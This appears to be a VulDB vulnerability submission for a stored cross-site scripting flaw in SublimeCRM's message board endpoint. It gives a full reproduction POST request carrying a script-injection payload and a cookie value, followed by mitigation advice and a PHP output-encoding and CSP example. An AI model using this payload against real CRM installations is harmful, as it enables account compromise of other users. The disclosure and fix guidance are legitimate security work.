| Field | Value |
|---|---|
| Title | Internet Web Solutions Sublime CRM N/A Cross Site Scripting |

**Description**

Vulnerability description:
**SublimeCRM**, a **Customer Relationship Management (CRM) platform**, contains a **Stored Cross-Site Scripting (XSS) vulnerability** in the `/crm/inicio.php` endpoint.
The **vulnerable parameter is `message`**, which is used when a user **posts a new message on the public board**. The CRM does not properly sanitize user input, allowing authenticated attackers to inject **persistent** JavaScript payloads.
Once the malicious XSS payload is stored in a new message, **it will automatically execute for any user as soon as they log into their account**, leading to **account compromise or unauthorized actions**.
Steps to reproduce:
1. **Log in** to the SublimeCRM platform at `https://www.sublimecrm.com/crm/inicio.php`.
2. Send the following **malicious POST request** to create a new message:
```
POST /crm/inicio.php HTTP/2
Host: www.sublimecrm.com
Cookie: crm_iws=qp9ptvgov90d2s5q6dkn43phq7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 226
Origin: https://www.sublimecrm.com
Referer: https://www.sublimecrm.com/crm/inicio.php

pagina=1&orderby=time&orderby_dir=DESC&unique_edit_id=140&id=(Nuevo)&deleted=&msg_from=8&msg_to=0&message="><script>alert(1)</script>&time=&cliente_crm=1&details=0&edit=0&submit_element=1&delete_element=0
```
3. Submit the request.
4. Any **user who logs into the CRM will immediately trigger the stored JavaScript code**, executing it without any additional interaction.
Proposed solution:
- **Sanitize input**: Properly encode user input in the `message` parameter before storing it.
- **Escape output**: Ensure stored content is encoded properly before being rendered in the CRM interface.
- **Use Content Security Policy (CSP)**: Implement a **strict CSP** to block unauthorized script execution.
References: https://owasp.org/www-community/attacks/xss/
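The "escape output" and CSP recommendations above, as an added PHP example (not SublimeCRM's own code): the board's stored `message` value rendered first by unsafe string concatenation, then through context-correct HTML encoding, with a CSP header as a second layer. Function and variable names are assumptions; the stored value is the report's payload, constructed here as test input.

```php
<?php
// Added example, not SublimeCRM code. Names are assumptions.

// Vulnerable form: the stored message is concatenated straight into the
// page, so a stored "><script>alert(1)</script> becomes live markup that
// runs for every user who views the board after logging in.
function render_message_vulnerable(string $message): string
{
    return '<div class="board-message">' . $message . '</div>';
}

// Hardened form: encode at the point of output, for the HTML body context.
// ENT_QUOTES also neutralises the leading quote the payload uses to break
// out of an attribute; ENT_SUBSTITUTE stops invalid UTF-8 from making
// htmlspecialchars() return an empty string silently.
function render_message_safe(string $message): string
{
    $encoded = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<div class="board-message">' . $encoded . '</div>';
}

// Defence in depth: a strict CSP with no 'unsafe-inline', so an encoding
// site that was missed still cannot execute an injected inline <script>.
function csp_header(): string
{
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; "
         . "object-src 'none'; base-uri 'self'; frame-ancestors 'none'";
}

// Constructed input: the payload from the report, as it would sit in the DB
// after PHP decodes the form body.
$stored = '"><script>alert(1)</script>';

$safe = render_message_safe($stored);
if (strpos($safe, '<script') !== false) {
    throw new RuntimeException('encoding failed: script tag survived');
}

header(csp_header());
echo render_message_vulnerable($stored), PHP_EOL; // for comparison only
echo $safe, PHP_EOL;
```

Only the encoded form is safe to emit; the unencoded call is kept solely to show the difference side by side.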
| Field | Value |
|---|---|
| User | 6h4ack (UID 81245) |
| Submission | 07/02/2025 08:57 (1 year ago) |
| Moderated | 15/02/2025 16:44 (8 days later) |
| Status | Accepted |
| VulDB Entry | 295968 [Internet Web Solutions Sublime CRM up to 20250207 HTTP POST Request /crm/inicio.php msg_to cross site scripting] |
| Points | 17 |